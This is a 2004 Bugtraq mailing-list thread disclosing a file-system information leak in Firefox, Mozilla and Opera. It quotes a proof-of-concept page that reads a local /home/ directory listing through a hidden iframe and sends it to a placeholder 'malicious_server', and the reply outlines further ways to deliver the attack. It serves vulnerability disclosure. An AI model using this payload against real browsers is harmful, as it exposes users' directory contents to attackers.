Bugtraq mailing list archives
Re: Disclosure of file system information in Mozilla Firefox and Opera Browser:
From: Liu Die Yu <liudieyu () umbrella name>
Date: Thu, 02 Dec 2004 09:49:06 +0800
Target user doesn't need to click the OPEN button:1. Cross-site scripting vulnerabilities can get it done(on Mozilla, an internet page can't navigate to a local page directly ... but there are ways to bypass this restriction). 2. Ask target to open an HTML file in a remote SMBFS folder - expecting him to
mount -t smbfs [...] /mnt/[...] and open "/mnt/[...].html" in Mozilla :-)Attacker can *browse* target's folders and files(file content, filename, filesize, and even the date).
========== http://editive.com/referrer Giovanni Delvecchio wrote:
Title: Disclosure of file system information in Mozilla Firefox and Opera BrowserNote:I don't know if it could be considered really a security problem, anyway i'll try to explain my ideas.Sorry for my bad english. Author: Giovanni Delvecchio Bug: Disclosure of file system information Applications affected: - Firefox 1.0 - Mozilla 1.7 - Opera 7.54 (*) ( maybe also previous versions ) Tested versions: - Firefox 1.0 on Linux and Windows - Mozilla 1.7 on Windows - Opera 7.51,..7.54 on Linux Note:The content of this advisory could be applied also to other browsers, i have checked just Mozilla, Firefox,Opera and Microsoft Internet Explorer.Microsoft Internet Explorer seems not to be affected. Bug Description: ================A problem exist in some browsers where a frame can gain access to attributes of another frame or iframe. An application of this bug could be the possibility to disclose local directory structure.PoC: === ------ begin code.htm ----- <html> <body onLoad=" list_files=''; for(i=0;i<local_files.document.links.length;i++) {list_files+=local_files.document.links.item(i);} alert(list_files); //send list_files at malicious_serverdocument.location.href='http://malicious_server/grab.php?list='+list_files;"> <iframe name="local_files" src="file:///home/" height=0 width=0></iframe> </body> </html> ------ end of code.htm ------- Impact: ======A malicious server could obtain the content of /home/ directory ( or c:\Document and Setting\ for windows system ) and so know a set of usernames present on system target. Moreover, colud be possible know if a particolar program is installed on target system for a succesive attack.Anyway it cannot be exploited "directly" by a remote site, but only if the page is opened from a local path ( file://localpath/code.htm), since the iframe "local_files" belongs to a local domain.Note: with Internet Explorer code.htm doesn't work even in local. Possible Remote Exploitation: ======================== Question: How could a malicious remote user exploit it ? Answer:After that the user "victim" has required http://maliciuos_server/code.htm, if malicious_server responds with a page containing an unknown Content-Type field ( for example text/html. ,note the dot) ,the browser will show a dialog window with some options (open, save, cancel). Choosing "Open" to view this page, it will be downloaded and opened in local ; javascript code will be executed in local context.Obviously, if user chooses to save and after open it the result is equal.(*) For Opera this method of remote exploitation requires that opera must be setted as Default Application in "handler for saved files" whether the user choose "Open" in the dialog window.Solution: ======== No solution at the moment Vendor notice ============== 24th November 2004: I have contacted mozilla by security () mozilla org and Opera by its bug track page at https://bugs.opera.com/wizard/ No response from both at the moment. Best regards, Giovanni Delvecchio _________________________________________________________________Personalizza MSN Messenger con sfondi e fotografie! http://www.ilovemessenger.msn.it/.
Current thread:
- Disclosure of file system information in Mozilla Firefox and Opera Browser: Giovanni Delvecchio (Dec 01)
- Re: Disclosure of file system information in Mozilla Firefox and Opera Browser: Liu Die Yu (Dec 02)
- <Possible follow-ups>
- RE: Disclosure of file system information in Mozilla Firefox and Opera Browser: Thor Larholm (Dec 07)